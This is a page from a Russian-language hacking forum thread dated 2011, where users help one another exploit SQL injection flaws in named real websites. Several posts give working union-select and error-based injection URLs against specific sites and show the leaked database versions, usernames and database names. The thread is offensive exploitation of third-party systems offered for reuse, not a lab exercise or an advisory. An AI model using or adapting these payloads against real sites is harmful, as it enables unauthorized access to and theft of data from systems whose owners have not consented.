HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Перезагрузить страницу Ваши вопросы по уязвимостям.
   
Ответ
Страница 1682 из 2438 « Первая < 6821182158216321672 1678 1679 1680 1681 1682 1683 1684 1685 1686 1692173217822182 > Последняя »
 
Опции темы Поиск в этой теме Опции просмотра

  #16811  
Старый 21.04.2011, 11:19
Expl0ited
Guest
Сообщений: n/a
Провел на форуме:
262707

Репутация: 935
По умолчанию
Цитата:
Сообщение от ta-kyn  
ta-kyn said:
C завидной регулярностью попадаю на такую штуку.
Не получается подобрать кол-во полей. Что не так?
Пример, вот. Ошибка не пропадает, хоть убейся.
http://www.oaontc.ru/node/243?SysNum=137159
Глаза пошире сделай:

Код:
Code:
http://www.oaontc.ru/node/243?SysNum=(13715)and(1)=(2)union+select(version()),2,3,4,5,6,7,8/*
 
Ответить с цитированием

  #16812  
Старый 21.04.2011, 16:08
Tigger
Познавший АНТИЧАТ
Регистрация: 27.08.2007
Сообщений: 1,107
Провел на форуме:
5386281

Репутация: 1177


Отправить сообщение для Tigger с помощью ICQ
По умолчанию
Цитата:
Сообщение от ta-kyn  
ta-kyn said:
C завидной регулярностью попадаю на такую штуку.
Не получается подобрать кол-во полей. Что не так?
Пример, вот. Ошибка не пропадает, хоть убейся.
http://www.oaontc.ru/node/243?SysNum=137159
Потому что там двойной запрос. Надоели такие вопросы, появляются постоянно! Учите мат. часть.

Цитата:
Сообщение от Expl0ited  
Expl0ited said:
Глаза пошире сделай:
Код:
Code:
http://www.oaontc.ru/node/243?SysNum=(13715)and(1)=(2)union+select(version()),2,3,4,5,6,7,8/*
Зачем же так, когда все делается намного проще:

http://www.oaontc.ru/node/243?SysNum=137159+and+1=2+union+select+1,version() ,3,4,5--+

4.1.25-log
 
Ответить с цитированием

  #16813  
Старый 23.04.2011, 12:44
genzome
Guest
Сообщений: n/a
Провел на форуме:
1183

Репутация: 0
По умолчанию
http://www.oaontc.ru/node/243?SysNum=-13+union+select+1,version%28%29,3,4,5--

А так не проще? или я чегото не догоняю?
 
Ответить с цитированием

  #16814  
Старый 23.04.2011, 13:24
Fooog
Постоянный
Регистрация: 19.09.2008
Сообщений: 511
Провел на форуме:
1866685

Репутация: 340


Отправить сообщение для Fooog с помощью ICQ Отправить сообщение для Fooog с помощью AIM Отправить сообщение для Fooog с помощью Yahoo
По умолчанию
Похоже что это sql-inj

Но вот когда начинаю искать количество столбцов (order by) перекидывает на другую страницу. Как с таким быть?

http://www.cue.ru/catalog.php?pid=1'
 
Ответить с цитированием

  #16815  
Старый 23.04.2011, 14:16
M_script
Новичок
Регистрация: 04.11.2004
Сообщений: 5
Провел на форуме:
4512

Репутация: 0
По умолчанию
Цитата:
Сообщение от Fooog  
Fooog said:
Похоже что это sql-inj
Но вот когда начинаю искать количество столбцов (order by) перекидывает на другую страницу. Как с таким быть?
http://www.cue.ru/catalog.php?pid=1'
pid=1)+order+by+1/*

upd:

Код HTML:
HTML:
http://www.cue.ru/catalog.php?pid=1)+or+(select+count(*)+from+(select+1+union+select+2+union+select+3)a+group+by+mid(concat_ws(0x3a,version(),user(),database()),floor(rand(0)*2),64))/*
4.1.15-Debian_1-log:qp_newcue@localhost:qp_newcue
 
Ответить с цитированием

  #16816  
Старый 23.04.2011, 15:46
Expl0ited
Guest
Сообщений: n/a
Провел на форуме:
262707

Репутация: 935
По умолчанию
Цитата:
Сообщение от genzome  
genzome said:
http://www.oaontc.ru/node/243?SysNum=-13+union+select+1,version%28%29,3,4,5--
А так не проще? или я чегото не догоняю?
Раз такая пьянка, тогда можно и так:

Код:
Code:
http://www.oaontc.ru/node/243?SysNum=(0)union+select(version())--+
 
Ответить с цитированием

  #16817  
Старый 25.04.2011, 01:18
recfrf
Новичок
Регистрация: 22.08.2008
Сообщений: 10
Провел на форуме:
149978

Репутация: 6
По умолчанию
что можно придумать если запрос в котором есть точка обрезается после неё, те невозможно получить информацию к примеру из information_schema.tables получается information_schema все что после режется.
 
Ответить с цитированием

  #16818  
Старый 25.04.2011, 04:00
M_script
Новичок
Регистрация: 04.11.2004
Сообщений: 5
Провел на форуме:
4512

Репутация: 0
По умолчанию
Цитата:
Сообщение от recfrf  
recfrf said:
что можно придумать если запрос в котором есть точка обрезается после неё
Таблицы брутить, колонки пробовать вывести через ошибки.
 
Ответить с цитированием

  #16819  
Старый 25.04.2011, 13:13
qaz
Guest
Сообщений: n/a
Провел на форуме:
344922

Репутация: 75
По умолчанию
народ подскажите пожалуйста как дальше разкручивать подобный скуль

http://www.photoclub.com.ua/rubric/?id=34' union select 1 from rubric where 1='
 
Ответить с цитированием

  #16820  
Старый 25.04.2011, 13:16
cat1vo
Новичок
Регистрация: 12.08.2009
Сообщений: 1
Провел на форуме:
11937

Репутация: 0
По умолчанию
Цитата:
Сообщение от None  
http://www.photoclub.com.ua/rubric/?id=34'+or+(select+count(*)+from+(select+1+union+s elect+2+union+select+3)x+group+by+concat(version() ,floor(rand(0)*2)))--+'
SQL error: Duplicate entry '5.1.49-3-log1' for key 'group_key'
 
Ответить с цитированием
Ответ
Страница 1682 из 2438 « Первая < 6821182158216321672 1678 1679 1680 1681 1682 1683 1684 1685 1686 1692173217822182 > Последняя »



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ